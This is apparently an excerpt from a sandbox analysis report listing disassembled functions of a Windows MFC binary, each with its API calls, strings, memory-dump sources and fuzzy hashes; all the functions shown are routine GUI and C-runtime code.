Opcode Fuzzy Hash: df00d40b3fae93e7aba9ef7a6a7ffcfb34fc161b7c11c42aef19d77cef8100b2
Instruction Fuzzy Hash: 85018436510755BF8F125BA5DC98E9F7BACEF8A7A0B118015FD1197220EB34EE0087A1

Function 00C2D457 Relevance: 7.6, APIs: 5, Instructions: 51COMMON

Download Yara Rule

APIs

GetClientRect.USER32(?,?), ref: 00C2D48A
GetCursorPos.USER32(?), ref: 00C2D49A
ScreenToClient.USER32(?,?), ref: 00C2D4A7
PtInRect.USER32(?,?,?), ref: 00C2D4B7
SetCursor.USER32(?), ref: 00C2D4C7

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: ClientCursorRect$Screen
String ID:
API String ID: 1023402310-0
Opcode ID: 9c34b560ed2acaf3509345f96e4bb5568a54dd5e6391755c13b41609498aecf6
Instruction ID: 8601af48511498a2f006aabf36f721c3ca31e22a4438104869485a72517e96f7
Opcode Fuzzy Hash: 9c34b560ed2acaf3509345f96e4bb5568a54dd5e6391755c13b41609498aecf6
Instruction Fuzzy Hash: 17111C71D0020ADFCB11EFA5D8849AEFBF9FF54300B00442AE516E6120DB346A02DF51

Function 00BFF34E Relevance: 7.5, APIs: 5, Instructions: 48windowCOMMON

Download Yara Rule

APIs

PeekMessageA.USER32(?,?,00000367,00000367,00000003), ref: 00BFF374
PostMessageA.USER32(?,00000367,00000000,00000000), ref: 00BFF38C
GetCapture.USER32 ref: 00BFF38E
ReleaseCapture.USER32 ref: 00BFF399
PostMessageA.USER32(?,0000036A,00000000,00000000), ref: 00BFF3C7

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: Message$CapturePost$PeekRelease
String ID:
API String ID: 1125932295-0
Opcode ID: 3a54213b09c7e6483826508e58424343a071f3ecbf7306d29e3d411b884ebac6
Instruction ID: d9be1cd4f6bb54ae9adf7ba55e332ba74ed64913563c38e0c11dd045e4cccdbb
Opcode Fuzzy Hash: 3a54213b09c7e6483826508e58424343a071f3ecbf7306d29e3d411b884ebac6
Instruction Fuzzy Hash: D801DB31200205BFDB202B20CC8AF2B7AFCFB84B04F00456EF186961A0EA70A844CB65

Function 00BE284B Relevance: 7.5, APIs: 5, Instructions: 45windowCOMMON

Download Yara Rule

APIs

ScreenToClient.USER32(?,?), ref: 00BE285A
SendMessageA.USER32(?,00000366,00000000,?), ref: 00BE2876
ClientToScreen.USER32(?,?), ref: 00BE2883
GetWindowLongA.USER32(?,000000F0), ref: 00BE288C
GetParent.USER32(?), ref: 00BE289A

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: ClientScreen$LongMessageParentSendWindow
String ID:
API String ID: 4240056119-0
Opcode ID: 165d203755d01cfa903f3b9de7b138565cb85dfd8ac95e1fef2da8c4da451714
Instruction ID: f49114406e02b619bdb2836a790b96657d7f7890c571d539a82dc7192efb82a1
Opcode Fuzzy Hash: 165d203755d01cfa903f3b9de7b138565cb85dfd8ac95e1fef2da8c4da451714
Instruction Fuzzy Hash: 18F0A43A1006A47FE7124B1A9C44BAF37ACEF81771F144216FD25DA180DB34EE4182A5

Function 00C2A95E Relevance: 7.5, APIs: 5, Instructions: 45COMMON

Download Yara Rule

APIs

PtInRect.USER32(?,?,?), ref: 00C2A97E
RedrawWindow.USER32(?,00000000,00000000,00000401), ref: 00C2A996
PtInRect.USER32(?,?,?), ref: 00C2A9B0
ReleaseCapture.USER32 ref: 00C2A9BD
RedrawWindow.USER32(?,00000000,00000000,00000401), ref: 00C2A9CD

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: RectRedrawWindow$CaptureRelease
String ID:
API String ID: 1080614547-0
Opcode ID: bb7a73c4e4d5c4aee50b8b51dc8fc24dca43dd115c34d6c054b7c4a56a3f1b17
Instruction ID: d23e4353de0d9ad9918b7af9b7ae17c9e00bb4c40feae1e2c9705270859c6f9a
Opcode Fuzzy Hash: bb7a73c4e4d5c4aee50b8b51dc8fc24dca43dd115c34d6c054b7c4a56a3f1b17
Instruction Fuzzy Hash: 04015235000B55EFDB216F62DC48E5BBBFAFB84711B01441AF26685820DB31A591DF51

Function 00BF8197 Relevance: 7.5, APIs: 5, Instructions: 44COMMON

Download Yara Rule

APIs

GetCursorPos.USER32(00000000), ref: 00BF81AD
ScreenToClient.USER32(?,00000000), ref: 00BF81BA
PtInRect.USER32(?,00000000,00000000), ref: 00BF81CD
LoadCursorA.USER32(00000000,00007F86), ref: 00BF81EC
SetCursor.USER32(00000000), ref: 00BF81F8

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: Cursor$ClientLoadRectScreen
String ID:
API String ID: 2747913190-0
Opcode ID: 4ae6258b805c4ace5d46aa11a895b7230a4d55d2a6e0b04da04eb584f4f184b2
Instruction ID: 14f884c867b503d198a9a50f51fe3e9bff4f70d3ec46c8dd6938bee9a08cb4a9
Opcode Fuzzy Hash: 4ae6258b805c4ace5d46aa11a895b7230a4d55d2a6e0b04da04eb584f4f184b2
Instruction Fuzzy Hash: 15011A72900249FFDB109FA1DC89FAE7BF9EB08355F0004A9F506D6160EB75AA44AB61

Function 00C3F459 Relevance: 7.5, APIs: 5, Instructions: 36windowCOMMON

Download Yara Rule

APIs

EnableMenuItem.USER32(?,00004212,00000001), ref: 00C3F476
EnableMenuItem.USER32(?,00004213,00000001), ref: 00C3F481
EnableMenuItem.USER32(?,00004214,00000001), ref: 00C3F48C
EnableMenuItem.USER32(?,00004211,00000001), ref: 00C3F497
EnableMenuItem.USER32(?,0000420F,00000001), ref: 00C3F4A2

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: EnableItemMenu
String ID:
API String ID: 1841910628-0
Opcode ID: 855a7dee76a05688b9d306e2fd59a03ee68beb535e7a1d21232b59414fa54568
Instruction ID: 7bf8cf87c9884ee719c81f67ec3a471cfaa5456a8becf97f37fb448ad8f87b44
Opcode Fuzzy Hash: 855a7dee76a05688b9d306e2fd59a03ee68beb535e7a1d21232b59414fa54568
Instruction Fuzzy Hash: 09F039F278011C7EF6101A56DD82C27FE6DEB547A87404122B318664B187A1AC20DAE4

Function 00CCF441 Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 00CCF44D

Part of subcall function 00CCD4D1: __getptd_noexit.LIBCMT ref: 00CCD4D4
Part of subcall function 00CCD4D1: __amsg_exit.LIBCMT ref: 00CCD4E1

__getptd.LIBCMT ref: 00CCF464
__amsg_exit.LIBCMT ref: 00CCF472
__lock.LIBCMT ref: 00CCF482
__updatetlocinfoEx_nolock.LIBCMT ref: 00CCF496

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
String ID:
API String ID: 938513278-0
Opcode ID: d7df5a3b5abc4d0d60b41769e15403efe54865e4f887cfcbdfa9b68a341c9f0d
Instruction ID: 5b30cfad141c17514d5f5b5078d079d2f82457de17236469d81b3f2a88714282
Opcode Fuzzy Hash: d7df5a3b5abc4d0d60b41769e15403efe54865e4f887cfcbdfa9b68a341c9f0d
Instruction Fuzzy Hash: 5CF0B432E44314DBD729FBB8D803F4E33A1AF00721F2542AEF514A62D2CB349942EA65

Function 00C90A9C Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 432COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00C90AA3
IsRectEmpty.USER32(?), ref: 00C90EC2
OffsetRect.USER32(?,00000000,00000001), ref: 00C90EFE

Strings

!, xrefs: 00C90D48

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: Rect$EmptyH_prolog3_Offset
String ID: !
API String ID: 307044148-2657877971
Opcode ID: 1796c6837d938279afca5b25576953949ae121b8fb610cc1b99e4a432f058a37
Instruction ID: d6ffa2d2a1f45c8f526f3c9032fca805939fd844b01e0b2c7d9cf3cbc87418df
Opcode Fuzzy Hash: 1796c6837d938279afca5b25576953949ae121b8fb610cc1b99e4a432f058a37
Instruction Fuzzy Hash: BA026C71E00619DFCF14DFE4C889AEEBBB9FF08300F244169E915AB255DB70AA45CB50

Function 00BD21E0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 124COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 00BD2254
std::_Xinvalid_argument.LIBCPMT ref: 00BD226F
_memmove.LIBCMT ref: 00BD22C4

Part of subcall function 00BD24B0: std::_Xinvalid_argument.LIBCPMT ref: 00BD24C8
Part of subcall function 00BD24B0: std::_Xinvalid_argument.LIBCPMT ref: 00BD24E6
Part of subcall function 00BD24B0: std::_Xinvalid_argument.LIBCPMT ref: 00BD2501
Part of subcall function 00BD24B0: _memmove.LIBCMT ref: 00BD2564

Strings

string too long, xrefs: 00BD224F, 00BD226A

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: Xinvalid_argumentstd::_$_memmove
String ID: string too long
API String ID: 2168136238-2556327735
Opcode ID: 8d46c0ec5d3b30af3bdb51a0a43f7284d702af861b9c4bfcce9dfbdc0fe09804
Instruction ID: 692790fa7f2213671831939402f650841e4a8347514b9e2dd2e7fdfc81486100
Opcode Fuzzy Hash: 8d46c0ec5d3b30af3bdb51a0a43f7284d702af861b9c4bfcce9dfbdc0fe09804
Instruction Fuzzy Hash: AA31E7723046908BD724DFACE880A6AF7E9EFB572072046AFF65187741E7719C41C7A4

Function 00C6C915 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 100COMMON

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 00C6C91F

Part of subcall function 00C57C9D: __EH_prolog3.LIBCMT ref: 00C57CA4

Part of subcall function 00BE8977: __EH_prolog3.LIBCMT ref: 00BE897E

Part of subcall function 00BE8935: __EH_prolog3.LIBCMT ref: 00BE893C

Part of subcall function 00C579CF: __EH_prolog3.LIBCMT ref: 00C579D6

_free.LIBCMT ref: 00C6CA17

Strings

%sMDIClientArea-%d, xrefs: 00C6C95E
MDITabsState, xrefs: 00C6CA09

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: H_prolog3$H_prolog3_catch_free
String ID: %sMDIClientArea-%d$MDITabsState
API String ID: 276651542-353449602
Opcode ID: cc9b1deaf4ec7999b565bea2552ca39f854c9c1845003175a54eee7b59618e72
Instruction ID: 8c2ea0b96b0736f7f4ce0bd80d6c95ef87dbb761bb2f1a344c64db2712c2c34a
Opcode Fuzzy Hash: cc9b1deaf4ec7999b565bea2552ca39f854c9c1845003175a54eee7b59618e72
Instruction Fuzzy Hash: A6419C7490028CAFCF01EFE4C895AEDBBB4AF18304F14409DF559AB282DB705E45DB21

Function 00C48E79 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 95COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00C48E80
CopyRect.USER32(?,?), ref: 00C48EC5
GetClientRect.USER32(?,?), ref: 00C48EE0

Strings

Afx:DockPane, xrefs: 00C48F66

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: Rect$ClientCopyH_prolog3_
String ID: Afx:DockPane
API String ID: 871324638-3269875795
Opcode ID: 39513ba7a6f5919b61dcd0b17f7b774d488f17eb2ce13c3ccd9e18ffa46990b7
Instruction ID: 018159796bc1a05472444d90a77da7aa380ab2b13dd252c8af2bca22a9f4890c
Opcode Fuzzy Hash: 39513ba7a6f5919b61dcd0b17f7b774d488f17eb2ce13c3ccd9e18ffa46990b7
Instruction Fuzzy Hash: 164106B0900209DFDF44CFA4D894AEEBBB5FF08310F14856AF919EB251DB349A49CB60

Function 00BE1CA5 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 94COMMON

Download Yara Rule

APIs

__snwprintf_s.LIBCMT ref: 00BE1CF0
__snwprintf_s.LIBCMT ref: 00BE1D22

Part of subcall function 00CC74FC: __getptd_noexit.LIBCMT ref: 00CC74FC

Strings

Afx:%p:%x:%p:%p:%p, xrefs: 00BE1D18
Afx:%p:%x, xrefs: 00BE1CE6

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: __snwprintf_s$__getptd_noexit
String ID: Afx:%p:%x$Afx:%p:%x:%p:%p:%p
API String ID: 101746997-2801496823
Opcode ID: 5d89532b12260e69cb8e975fb9733238f66ffc3ffb512078ca1cad5f9d61eab3
Instruction ID: 721b420dc256d0be577e9509692cac64029dc7dfdc65518d36f8bdf4b6704973
Opcode Fuzzy Hash: 5d89532b12260e69cb8e975fb9733238f66ffc3ffb512078ca1cad5f9d61eab3
Instruction Fuzzy Hash: 2A311071940249AFCB11EF69CC42E9EBFF4EF48350F10856AF914AB252E7709950DF61

Function 00BE60C0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 72windowCOMMONLIBRARYCODE

Download Yara Rule

APIs

_memset.LIBCMT ref: 00BE60E5
GetSysColor.USER32(00000014), ref: 00BE612F
CreateDIBitmap.GDI32(?,00000028,00000004,?,00000028,00000000), ref: 00BE6182

Strings

(, xrefs: 00BE6113

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: BitmapColorCreate_memset
String ID: (
API String ID: 3930187609-3887548279
Opcode ID: 1e5c5c48e0399de4dcd094948e11a2457ee2c6b258e1379ed136c843157151cb
Instruction ID: b23b86499899692c703b96308e446b701e52daeb9ba8a8f9f371e909ef4400bf
Opcode Fuzzy Hash: 1e5c5c48e0399de4dcd094948e11a2457ee2c6b258e1379ed136c843157151cb
Instruction Fuzzy Hash: 7821C231A10258DFEB04DBB8CC56BEDBBF8AB54701F00846EE546EB281DE355A48CF65

Function 00C03CFA Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 72libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(DWMAPI,?,?,00000000,?,?,?,?,?,?,?,?,00C6A7DD), ref: 00C03D71
GetProcAddress.KERNEL32(00000000,DwmInvalidateIconicBitmaps), ref: 00C03D81

Strings

DwmInvalidateIconicBitmaps, xrefs: 00C03D7B
DWMAPI, xrefs: 00C03D6C

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: DWMAPI$DwmInvalidateIconicBitmaps
API String ID: 1646373207-1098356003
Opcode ID: a49c1fd290bdd55c706af7d824f12f0ba452fe13e750494f89446219e0a08aec
Instruction ID: 217f34dbf682054cecbedca2026a81326fd6fe263f2fcd1d9ece9a2d99e80bbf
Opcode Fuzzy Hash: a49c1fd290bdd55c706af7d824f12f0ba452fe13e750494f89446219e0a08aec
Instruction Fuzzy Hash: BF116071A103459FCB10EF768989AAF77E9EF49340B14097DA816EB281EA71DF04CB60

Function 00BE6B45 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00BE6B4C
LoadCursorA.USER32(00000000,00007F00), ref: 00BE6B78
GetClassInfoA.USER32(?,00000000,?), ref: 00BE6BBC

Part of subcall function 00BD71ED: __CxxThrowException@8.LIBCMT ref: 00BD7203
Part of subcall function 00BD71ED: __EH_prolog3.LIBCMT ref: 00BD7210

Strings

%s:%x:%x:%x:%x, xrefs: 00BE6BA6

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: H_prolog3$ClassCursorException@8InfoLoadThrow
String ID: %s:%x:%x:%x:%x
API String ID: 3308755097-1000192757
Opcode ID: 1e619306f7e5c1795730f918ae13fa8d39b75427e5dddcaed8bc49e95a03b28a
Instruction ID: c5d51140c7102ae72eb0b0c85d726e7a2c4a9c5842fb44069add0640398126cb
Opcode Fuzzy Hash: 1e619306f7e5c1795730f918ae13fa8d39b75427e5dddcaed8bc49e95a03b28a
Instruction Fuzzy Hash: F021E7B1D41209AFDB00EFA9D885A9EFBB4FF18300F10446AF545A7351EB749A409B65

Function 00C0D136 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59COMMON

Download Yara Rule

APIs

FillRect.USER32(?,?), ref: 00C0D15B
InflateRect.USER32(?,000000FF,000000FF), ref: 00C0D192
DrawEdge.USER32(?,?,00000000,0000000F), ref: 00C0D1B2

Strings

iii, xrefs: 00C0D178

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: Rect$DrawEdgeFillInflate
String ID: iii
API String ID: 785442924-940974255
Opcode ID: c15a8674588e8773c13b0eac9ffa7016f657f0a8b2c08cf209d8b747c75042ca
Instruction ID: 16cad27784d3f4937b5ecb27d869137388b81e2161cdfdcaa202c8c2fb03d5e5
Opcode Fuzzy Hash: c15a8674588e8773c13b0eac9ffa7016f657f0a8b2c08cf209d8b747c75042ca
Instruction Fuzzy Hash: 58111CB2500209AFCF00DFA4DD84EAF7BBDFB49324B104625B915EB191D731AA05CB61

Function 00BE0386 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 43libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 00BFDA10: EnterCriticalSection.KERNEL32(00D333F0,?,?,00000000,?,00BE33DC,00000010,00000008,00BDB69B,00BDB632,00BD7209,00BD43FF,00000214,00BD101B), ref: 00BFDA4A
Part of subcall function 00BFDA10: InitializeCriticalSection.KERNEL32(?,?,?,00000000,?,00BE33DC,00000010,00000008,00BDB69B,00BDB632,00BD7209,00BD43FF,00000214,00BD101B), ref: 00BFDA5C
Part of subcall function 00BFDA10: LeaveCriticalSection.KERNEL32(00D333F0,?,?,00000000,?,00BE33DC,00000010,00000008,00BDB69B,00BDB632,00BD7209,00BD43FF,00000214,00BD101B), ref: 00BFDA69
Part of subcall function 00BFDA10: EnterCriticalSection.KERNEL32(?,?,?,00000000,?,00BE33DC,00000010,00000008,00BDB69B,00BDB632,00BD7209,00BD43FF,00000214,00BD101B), ref: 00BFDA79

Part of subcall function 00BE33C1: __EH_prolog3_catch.LIBCMT ref: 00BE33C8

Part of subcall function 00BD71ED: __CxxThrowException@8.LIBCMT ref: 00BD7203
Part of subcall function 00BD71ED: __EH_prolog3.LIBCMT ref: 00BD7210

GetProcAddress.KERNEL32(00000000,HtmlHelpA), ref: 00BE03CF
FreeLibrary.KERNEL32(?), ref: 00BE03DF

Strings

hhctrl.ocx, xrefs: 00BE03B3
HtmlHelpA, xrefs: 00BE03C9

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
